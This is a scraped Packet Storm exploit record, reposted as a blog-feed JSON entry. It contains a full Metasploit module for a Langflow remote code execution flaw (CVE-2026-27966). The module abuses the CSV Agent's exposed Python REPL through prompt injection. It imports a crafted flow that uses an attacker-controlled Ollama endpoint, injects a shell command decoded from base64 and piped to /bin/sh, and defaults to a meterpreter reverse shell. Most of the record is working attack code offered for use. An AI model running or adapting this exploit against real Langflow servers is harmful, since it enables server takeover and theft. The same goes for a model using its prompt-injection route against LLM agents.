{“lastseen”:”2026-04-23T17:39:29″,”description”:”The CSV Agent node in Langflow hardcodes allowdangerouscode=True, which automatically exposes the LangChains Python REPL tool pythonreplast. As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection,…”,”published”:”2026-04-23T00:00:00″,”modified”:”2026-04-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Langflow Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:219709″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-27966″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Post::File\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Langflow RCE’,\\n ‘Description’ =\\u003e %q{\\n The CSV Agent node in Langflow hardcodes allow_dangerous_code=True, which automatically exposes LangChain’s Python REPL tool (python_repl_ast).\\n As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE).\\n },\\n ‘Author’ =\\u003e [\\n ‘weblover12’, # Vulnerability discovery and PoC\\n ‘Takahiro Yokoyama’ # Metasploit module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-27966’],\\n [‘GHSA’, ‘3645-fxcv-hqr4’],\\n ],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Linux Command’, {\\n ‘Arch’ =\\u003e [ ARCH_CMD ], ‘Platform’ =\\u003e [ ‘unix’, ‘linux’ ], ‘Type’ =\\u003e :nix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/linux\/http\/x64\/meterpreter_reverse_tcp’\\n }\\n }\\n ],\\n [\\n ‘Python payload’,\\n {\\n ‘Platform’ =\\u003e ‘python’,\\n ‘Arch’ =\\u003e ARCH_PYTHON,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘python\/meterpreter\/reverse_tcp’ }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘WfsDelay’ =\\u003e 300,\\n ‘FETCH_DELETE’ =\\u003e true\\n },\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘\\”‘\\n },\\n ‘DisclosureDate’ =\\u003e ‘2026-02-25’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [ CRASH_SAFE, ],\\n ‘SideEffects’ =\\u003e [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION, ]\\n }\\n )\\n )\\n register_options(\\n [\\n Opt::RPORT(7860),\\n OptString.new(‘APIKEY’, [ true, ‘Langflow API key to interact with Langflow.’, ” ]),\\n OptString.new(‘OLLAMAAPIURI’, [ true, ‘Endpoint of the OLLAMA API controlled by an attacker.’, ” ]),\\n OptString.new(‘MODEL’, [ true, ‘Valid ollama model name.’, ” ]),\\n ]\\n )\\n end\\n \\n def check\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v1\/version’)\\n })\\n return Exploit::CheckCode::Unknown(‘Unexpected server reply.’) unless res\\u0026.code == 200\\n \\n json_version = res\\u0026.get_json_document\\u0026.fetch(‘version’, nil)\\n return Exploit::CheckCode::Unknown(‘Failed to parse version.’) unless json_version\\n \\n version = Rex::Version.new(json_version)\\n return Exploit::CheckCode::Unknown(‘Failed to get version.’) unless version\\n \\n return Exploit::CheckCode.Safe(\\”Version #{version} detected. Which is not vulnerable.\\”) if version \\u003e= Rex::Version.new(‘1.8.0’)\\n \\n # check if API key is valid\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v1\/users\/whoami’),\\n ‘headers’ =\\u003e {\\n ‘x-api-key’ =\\u003e datastore[‘APIKEY’]\\n }\\n })\\n return Exploit::CheckCode::Appears(\\”Version #{version} detected and API key is valid. Which is vulnerable.\\”) if res\\u0026.code == 200\\n \\n Exploit::CheckCode.Safe(\\”Version #{version} detected and API key is invalid. Which is not vulnerable.\\”)\\n end\\n \\n def exploit\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri, ‘api\/v1\/projects\/’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e {\\n ‘x-api-key’ =\\u003e datastore[‘APIKEY’]\\n },\\n ‘data’ =\\u003e {\\n ‘name’ =\\u003e rand_text_alphanumeric(8),\\n ‘description’ =\\u003e ‘string’,\\n ‘components_list’ =\\u003e [],\\n ‘flows_list’ =\\u003e []\\n }.to_json\\n })\\n @folder_id = res\\u0026.get_json_document\\u0026.fetch(‘id’, nil)\\n fail_with(Failure::Unknown, ‘Failed to create a new project.’) unless @folder_id\\n print_status(\\”Project: #{@folder_id}\\”)\\n \\n # construct POST data\\n fname = \\”#{rand_text_alphanumeric(8)}.csv\\”\\n data = Rex::MIME::Message.new\\n data.add_part(\\”#{rand_text_alphanumeric(2)},#{rand_text_alphanumeric(2)}\\”, ‘application\/csv’, nil, \\”form-data; name=\\\\\\”file\\\\\\”; filename=\\\\\\”#{fname}\\\\\\”\\”)\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri, ‘api\/v2\/files’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘headers’ =\\u003e {\\n ‘x-api-key’ =\\u003e datastore[‘APIKEY’]\\n },\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{data.bound}\\”,\\n ‘data’ =\\u003e data.to_s\\n })\\n path = res\\u0026.get_json_document\\u0026.fetch(‘path’)\\n fail_with(Failure::Unknown, ‘Failed to upload a csv file.’) unless path\\n @fid = res\\u0026.get_json_document\\u0026.fetch(‘id’)\\n \\n exploit_data = exploit_data(‘CVE-2026-27966’, ‘cve_2026_27966.json’)\\n exploit_data = exploit_data.gsub(‘__FOLDERID__’, @folder_id)\\n exploit_data = exploit_data.gsub(‘__MODELNAME__’, datastore[‘MODEL’])\\n exploit_data = exploit_data.gsub(‘__OLLAMAAPIURI__’, datastore[‘OLLAMAAPIURI’])\\n exploit_data = exploit_data.gsub(‘__FILEPATH__’, path)\\n case target[‘Arch’]\\n when ARCH_PYTHON\\n payload_data = payload.encode\\n else\\n payload_data = \\”__import__(‘os’).system(‘echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|\/bin\/sh’)\\”\\n end\\n exploit_data = exploit_data.gsub(‘__PAYLOAD__’, payload_data)\\n exploit_data = exploit_data.gsub(‘__NAME__’, rand_text_alphanumeric(8))\\n # construct POST data\\n data = Rex::MIME::Message.new\\n data.add_part(exploit_data, ‘application\/json’, nil, \\”form-data; name=\\\\\\”file\\\\\\”; filename=\\\\\\”#{rand_text_alphanumeric(3..9)}.json\\\\\\”\\”)\\n \\n # Import a flow\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri, ‘api\/v1\/flows\/upload\/’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{data.bound}\\”,\\n ‘data’ =\\u003e data.to_s,\\n ‘vars_get’ =\\u003e { ‘folder_id’ =\\u003e @folder_id },\\n ‘headers’ =\\u003e {\\n ‘x-api-key’ =\\u003e datastore[‘APIKEY’]\\n }\\n })\\n fail_with(Failure::Unknown, ‘Temporary failed to import a flow.’) unless res\\u0026.get_json_document.is_a?(Array)\\n flow_id = res\\u0026.get_json_document\\u0026.first\\u0026.fetch(‘id’, nil)\\n fail_with(Failure::Unknown, ‘Failed to import a flow.’) unless flow_id\\n print_status(\\”Flow: #{flow_id}\\”)\\n \\n # Execute\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri, \\”api\/v1\/build\/#{flow_id}\/flow\\”),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e {\\n ‘x-api-key’ =\\u003e datastore[‘APIKEY’]\\n }\\n })\\n job = res\\u0026.get_json_document\\u0026.fetch(‘job_id’)\\n fail_with(Failure::Unknown, ‘Unexpected server reply.’) unless job\\n print_status(\\”Job: #{job}\\”)\\n print_status(‘Waiting…’)\\n end\\n \\n def cleanup\\n super\\n if @fid\\n send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri, \\”api\/v2\/files\/#{@fid}\\”),\\n ‘method’ =\\u003e ‘DELETE’,\\n ‘headers’ =\\u003e {\\n ‘x-api-key’ =\\u003e datastore[‘APIKEY’]\\n }\\n })\\n end\\n if @folder_id\\n send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri, \\”api\/v1\/projects\/#{@folder_id}\\”),\\n ‘method’ =\\u003e ‘DELETE’,\\n ‘headers’ =\\u003e {\\n ‘x-api-key’ =\\u003e datastore[‘APIKEY’]\\n }\\n })\\n end\\n end\\n \\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219709″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219709\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-23T17:39:29″,”description”:”The CSV Agent node in Langflow hardcodes allowdangerouscode=True, which automatically exposes the LangChains Python REPL tool pythonreplast. As a result, an attacker can execute arbitrary…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-48986","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n